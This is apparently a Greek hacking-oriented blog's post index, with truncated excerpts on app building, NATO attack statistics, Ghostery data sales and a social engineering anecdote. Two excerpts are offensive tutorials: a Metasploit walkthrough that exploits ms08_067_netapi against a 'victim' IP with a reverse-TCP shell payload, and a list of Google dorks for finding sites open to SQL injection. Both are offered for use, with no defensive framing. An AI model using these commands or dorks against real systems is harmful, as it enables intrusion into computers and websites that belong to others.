Μετάβαση στο κύριο περιεχόμενο

Αναρτήσεις

Έχω Μια Ιδέα Για Μια Φοβερή Εφαρμογή, Αλλά Από Που Να Ξεκινήσω;

Έχετε μια ιδέα για μια φοβερή εφαρμογή και δεν μπορείτε να ησυχάσετε αν δεν την κατασκευάσετε. Αλλά δεν ξέρετε τίποτα από προγραμματισμό και δεν έχετε ιδέα για το πώς να ξεκινήσετε. Αν θέλετε βοήθεια για να υλοποιήσετε την ιδέα σας και να χτίσετε πραγματικά μια επιχείρηση γύρω από αυτήν, εμείς είμαστε εδώ για να βοηθήσουμε!. Αλλά αν θέλετε να βουτήξετε και να χτίσετε πραγματικά κάτι, τότε διαβάστε μια επισκόπηση υψηλού επιπέδου για το από που να ξεκινήσετε, με μια σειρά από διαφορετικές προσεγγίσεις για την οικοδόμηση της εφαρμογής σας. Το σημαντικό πράγμα που πρέπει να θυμάστε είναι πως οτιδήποτε εμπνευστήκατε να φτιάξετε, φτιάξτε το αμέσως., απλώς ξεκινήστε. Θα κάνουμε την προσέγγιση ξεκινώντας γρήγορα να κατασκευάσουμε ένα ελάχιστο βιώσιμο προϊόν (MVP). Ως εκ τούτου, η πιο σημαντική ερώτηση που πρέπει να κάνετε πρώτα στον εαυτό σας είναι η εξής … Ερώτηση 1: Τι είδους εφαρμογή θέλω να κατασκευάσω;
Η απάντηση σε αυτό οδηγεί σε δύο άλλα ερωτήματα: 1.Πώς θέλω να την χρησιμοποιήσουν οι άνθρω…

Το NATO δέχεται 500 επιθέσεις hacking το μήνα!

Tο NATO αποτελεί στόχο για πολλούς hackers παγκοσμίως καθώς σύμφωνα με πρόσφατο δημοσίευμα δέχεται κάθε μήνα κατά μέσο όρο 500 επιθέσεις.







Ο Oana Lungescu, εκπρόσωπος του ΝΑΤΟ, δήλωσε στο CNN ότι σημειώνεται αύξηση περίπου 60% του αριθμού των επιθέσεων το 2016 σε σχέση με το 2015. Συνήθως, η ταυτότητα των εισβολέων είναι δύσκολο να προσδιοριστεί παρόλο που γίνονται άμεσα έρευνες για τον εντοπισμό τους. Αναμφίβολα, οι ξένες κυβερνήσεις, οι εγκληματίες και οι τρομοκράτες αποτελούν πιθανή προέλευση των επιθέσεων αλλά σύμφωνα με τους ειδικούς ο υποψήφιος που κερδίζει με διαφορά είναι τα αντίπαλα έθνη.

Το μόνο σίγουρο είναι ότι το ΝΑΤΟ ξέρει πώς να διαχειριστεί την κατάσταση. Συγκεκριμένα, στα μέσα του 2016 προειδοποίησε του hackers ότι αν επιδιώξουν και άλλες επιθέσεις θα έχουν να αντιμετωπίσουν την απάντηση του συνόλου της συμμαχίας στο πλαίσιο του “Article V”, το σύμφωνο της αμοιβαίας άμυνας. «Έχουμε αποφασίσει στην επόμενη διαδικτυακή επίθεση να ανταποδώσουμε με παρόμοιο τρόπο όλο το σύνο…

Πρόσβαση σε απόμακρο υπολογιστή με χρήση του ms08_, ex067_netapi exploit

Σε αυτό το tutorial θα δούμε έναν από τους τρόπους με τους οποίους μπορούμε να αποκτήσουμε τον έλεγχο σε ένα απομακρυσμένο υπολογιστή με τη χρήση του ms08_067_netapi exploit.




Ανοίγω ένα τερματικό...
Terminal: 
root@bt:msfconsole <- font="">
[περιμένουμε να ενεργοποιηθεί λίγο το msfconsole]...
msf > search ms08_067_netapi <- font="">

[*] Searching loaded modules for pattern 'ms08_067_netapi'...
Exploits
========
Name
----
windows/smb/ms08_067_netapi
Corruption
Rank
----
great
Description
-----------
Microsoft Server Service Relative Path Stack

Συνχίζουμε γράφοντας τις παρακάτω εντολές...



msf > use windows/smb/ms08_067_netapi <- span="">
msf exploit(ms08_067_netapi) > show options <- span="">
msf exploit(ms08_067_netapi) > set RHOST 192.168.33.130 <- ip="" span="" victim="">
RHOST => 192.168.33.130
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp <- span="&qu…

Λίστα με dorks για sql injection

Mερικά dorks τα οποία μπορούμε να τα βάλουμε στο google και να κάνουμε αναζήτηση για ευπαθείς σελίδες στην sql injection.




inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurllay_old.php?id=
inurl:declaration_more.php?decl_id=
inurlageid=
inurl:games.php?id=
inurlage.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=d=
inurl:event.php?id=
inurlroduct-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurltray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?av
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?i…

How to identify SQL injection & how to manual + automatic exploitation (GR)

ΤΟ ΠΡΟΣΘΕΤΟ GHOSTERY ΔΙΝΕΙ ΤΑ ΣΤΟΙΧΕΙΑ ΜΑΣ ΣΤΙΣ ΕΤΑΙΡΕΙΕΣ ΔΙΑΦΗΜΙΣΗΣ!

Θα μπορούσαμε να το αποκαλέσουμε και κράχτη αφού αποτελεί ουσιαστικό μέρος της εργαλειοθήκης μας όταν είμαστε συνδεδεμένοι στο διαδίκτυο και προστατεύει την ιδιωτική μας ζωή.
Αυτό που οι περισσότεροι χρήστες δεν συνειδητοποιούν, αναφέρει το περιοδικό MIT Technology Review, είναι ότι η Evidon που είναι μητρική εταιρεία της Ghostery, συλλέγει τα δεδομένα των χρηστών και τα πωλεί στους διαφημιστές.




Θα πρέπει να καταστεί σαφές ότι αν επιλέξετε να ξεκλικάρετε την επιλογή για κοινή χρήση πληροφοριών εντός της Ghostery, τότε αυτομάτως αποκλείεται η συλλογή των δεδομένων σας και η Evidon συμμορφώνεται με τις πληροφορίες αυτού το αιτήματος.

Ο συν-ιδρυτής και Διευθύνων Σύμβουλος της Evidon, ο Scott Meyer, λέει ότι δεν υπάρχει καμμία σύγκρουση των δύο ρόλων της εταιρείας του που διαδραματίζει έναν καίριο ρόλο καθώς προσφέρει στους χρήστες ένα εργαλείο που τους κρύβει από τον κλάδο της διαφήμισης ενώ παράλληλα παρέχει δεδομένα σχετικά με τους χρήστες σε διαφημιστικές εταιρείες.
Οτιδήποτε δίνει στους …

Social Engineering : Παράδειγμα

Αυτό το παράδειγμα είναι αυτούσιο από το βιβλίο Social Engineering The Art of Human Hacking του Christopher Hadnagy και θα το παραθέσω μεταφρασμένο.

O C.H. λοιπόν μας μιλάει για την εμπειρία του όταν προσφέρθηκε να δείξει σε ένα show του BBC πόσο εύκολο θα ήταν όχι μόνο να κλέψει την τσάντα μιας γυναίκας και να πάρει την πιστωτική της κάρτα αλλά και τον κωδικό. Το BBC ασφαλώς είπε ότι αυτό δεν πρόκειται να συμβεί. Ο ίδιος με την ομάδα του ήξεραν ότι μπορούσαν να το κάνουν αφού είχαν αναφερθεί τέτοιου είδους απάτες.

Για να διαδραματίσουν λοιπόν το "πείραμα" τους πήγαν σε μια τοπική καφετέρια. Η καφετέρια ήταν στον ψηλότερο όροφο ενώς πολυκαταστήματος στην Oxford Street. Ήταν σχεδόν άδειο και αυτός έκατσε σε ένα άδειο τραπέζι φορώντας ένα "επαγγελματικό" κουστούμι, άφησε τον χαρτοφύλακα του στο τραπέζι και περίμενε για το κατάλληλο θύμα. Μετά από λίγη ώρα το κατάλληλο θύμα έφτασε μαζί με ένα φίλο του και κάτσανε στο διπλανό τραπέζι και το θύμα (η γυναίκα) άφησε την τσά…